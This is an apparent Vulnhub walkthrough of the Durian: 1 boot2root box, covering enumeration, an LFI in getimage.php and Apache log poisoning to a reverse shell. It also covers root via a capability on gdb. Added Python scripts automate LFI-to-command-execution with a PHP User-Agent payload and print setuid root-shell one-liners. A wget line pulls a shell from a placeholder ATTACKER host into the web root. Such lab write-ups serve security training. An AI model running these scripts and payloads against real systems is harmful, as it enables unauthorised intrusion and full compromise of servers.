Durian Vulnhub Walkthrough

Today I am sharing a writeup for the boot2root challenge of the Vulnhub machine Durian: 1. It is an intermediate Linux box, and our goal is to read the flag file in /root. You can download the machine here.

Network Scanning

We begin by scanning our network to find the target's IP address with Nmap. You can use any other tool, such as netdiscover.


The target machine is up on 192.168.43.77. Let's run an aggressive Nmap scan (nmap -A -p-) across all ports to identify the running services.

The scan finds four open ports: 22 (SSH), 7080 (LiteSpeed), 8000 (HTTP, nginx) and 8088 (HTTP, LiteSpeed).

Enumeration

Let's move on to enumeration and look for hidden files and directories on the web server with dirb.


dirb returns a few useful directories. Opening them one by one, we find getimage.php inside /cgi-data.

After checking the source of getimage.php we confirm that the URL is vulnerable to LFI (Local File Inclusion): the file name from the request goes straight into an include, so we read /etc/passwd to prove it.


We open Burp Suite, reload the page, capture the request and send it to Repeater. Then we try Apache log poisoning: a PHP tag placed in the User-Agent header is written into the access log verbatim, and including that log through the LFI executes it.


That gives us a working backdoor shell on the target. Next we fetch a PHP reverse shell onto the target machine through it, saving the payload into the /var/www/html/blog directory.


Once the reverse shell is on the target, we start a netcat listener and then trigger the shell by browsing to it under /blog.

We get a reverse connection from the target machine.
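
The LFI and log-poisoning steps above, scripted as an added example that is not part of the original walkthrough. It uses only the Python standard library. The parameter name `image`, the port 8000 base URL and the Apache access-log path are assumptions (the post does not name them), and the target must be a lab box you are authorised to attack.

```python
"""LFI -> Apache log poisoning -> command execution against getimage.php.

Added example, not the walkthrough's own code. Everything marked 'assumed'
is a guess the post does not confirm; pass real values on the command line.
"""
import re
import sys
import urllib.parse
import urllib.request

DEFAULT_BASE = "http://192.168.43.77:8000/cgi-data/getimage.php"  # assumed URL
DEFAULT_LOG = "/var/log/apache2/access.log"  # assumed log location on the box
PARAM = "image"                              # assumed name of the vulnerable parameter

# PHP tag planted in the User-Agent. Apache's combined log format writes the
# header into access.log verbatim, so the next include() of that log runs it
# and hands it whatever we pass in ?cmd=.
POISON_UA = "<?php system($_GET['cmd']); ?>"


def traversal(depth, target):
    """Build a '../' chain: traversal(4, '/etc/passwd') -> '../../../../etc/passwd'."""
    return "../" * depth + target.lstrip("/")


def lfi_url(base, path, param=PARAM):
    """URL that makes getimage.php include an arbitrary file."""
    return f"{base}?{param}={path}"


def poison_headers():
    """Headers for the poisoning request; the tag rides in User-Agent only."""
    return {"User-Agent": POISON_UA}


def trigger_url(base, log_path, cmd, param=PARAM):
    """Include the poisoned log and hand the shell command to the planted PHP."""
    return lfi_url(base, log_path, param) + "&cmd=" + urllib.parse.quote(cmd, safe="")


def interactive_users(passwd):
    """Account names from /etc/passwd with a real login shell (SSH candidates)."""
    users = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not re.search(r"/(nologin|false)$", fields[6]):
            users.append(fields[0])
    return users


def fetch(url, headers=None):
    """GET a URL and return the body as text."""
    req = urllib.request.Request(url, headers=headers or {})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_BASE
    log = sys.argv[2] if len(sys.argv) > 2 else DEFAULT_LOG
    cmd = sys.argv[3] if len(sys.argv) > 3 else "id"
    # 1. prove the LFI and note which accounts can actually log in
    print("users:", interactive_users(fetch(lfi_url(base, traversal(6, "/etc/passwd")))))
    # 2. poison the log (the response is irrelevant; the log line is what matters)
    fetch(base, headers=poison_headers())
    # 3. include the log with a command; the rest of the log comes back as noise
    print(fetch(trigger_url(base, log, cmd))[-1500:])
```

Send the PHP tag only in a header, never in the URL: a URL-encoded `<?php` in the request line lands in the log in a form PHP will not parse, and a malformed tag in the log breaks every later include. Once the trigger works, a command such as `wget http://ATTACKER/shell.php -O /var/www/html/blog/shell.php` (ATTACKER being your listener host) stages the reverse shell that the next step fires.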


Privilege Escalation

We check the sudo permissions for our current user with sudo -l and see that we can run two commands as root without a password. We also look for SUID binaries.

Neither turns up a useful binary, so we keep enumerating and run getcap -r / 2>/dev/null, which lists every file carrying file capabilities (stderr is discarded so permission-denied errors don't clutter the output).

It reports two files with capabilities, and gdb is the interesting one: a capability such as cap_setuid on a debugger that can run Python lets it call setuid(0) and spawn a shell. We run the gdb privilege-escalation one-liner and escalate to root.
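
An added example (not from the walkthrough) that sorts `getcap -r` output into what is worth attacking: it parses both libcap output formats, keeps only binaries whose effective set holds an identity-changing capability and that will run attacker-supplied code, and prints the matching one-liner. The getcap lines are constructed; only the gdb entry mirrors what the post found, and the capability on it (cap_setuid) is an assumption, since the page does not print the value.

```python
"""Triage getcap -r output for capability-based privilege escalation.

Added example, not code from the walkthrough. SAMPLE_GETCAP is constructed.
"""
import re

# Capabilities that change identity or bypass DAC: effectively root if the
# holder can be made to run our code.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace"}

# Binaries that execute caller-supplied code (GTFOBins-style list, trimmed).
SCRIPTABLE = {"gdb", "python", "perl", "ruby", "php", "node", "vim"}

# Constructed sample; the walkthrough only tells us gdb was in the list and
# the cap_setuid on it is assumed.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gdb = cap_setuid+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/python3.7 = cap_setuid+ep
"""

# Older libcap prints "path = caps+flags"; libcap 2.41+ prints "path caps=flags".
LINE_RE = re.compile(r"^(?P<path>\S+)\s*(?:=\s*)?(?P<caps>cap_[\w,]+)[+=](?P<flags>[epi]+)$")


def parse_getcap(text):
    """Yield (path, {caps}, flags) for every well-formed getcap line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["path"], set(m["caps"].split(",")), m["flags"]


def one_liner(base, path):
    """Shell command that turns cap_setuid on an interpreter into a root shell."""
    if base == "gdb":   # needs a gdb built with Python support
        return f"{path} -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit"
    if base == "python":
        return f"{path} -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'"
    if base == "perl":
        return f"{path} -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'"
    return f"{path}  # see the GTFOBins 'capabilities' entry for {base}"


def exploitable(text):
    """Return [(path, [dangerous caps], command)] for binaries worth trying.

    Only the Effective flag counts: a bare +p needs the program itself to
    raise the capability, which none of these interpreters do."""
    hits = []
    for path, caps, flags in parse_getcap(text):
        base = re.sub(r"[\d.]+$", "", path.rsplit("/", 1)[-1])  # python3.7 -> python
        bad = caps & DANGEROUS
        if "e" in flags and bad and base in SCRIPTABLE:
            hits.append((path, sorted(bad), one_liner(base, path)))
    return hits


if __name__ == "__main__":
    for path, caps, cmd in exploitable(SAMPLE_GETCAP):
        print(f"{path}: {','.join(caps)}\n    {cmd}")
```

Feed it the real output with `getcap -r / 2>/dev/null | python3 triage.py` after swapping `SAMPLE_GETCAP` for `sys.stdin.read()`; ping with cap_net_raw is the usual noise and is correctly ignored.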

Finally we have a root shell on the target. We move to the /root directory and read the final flag.
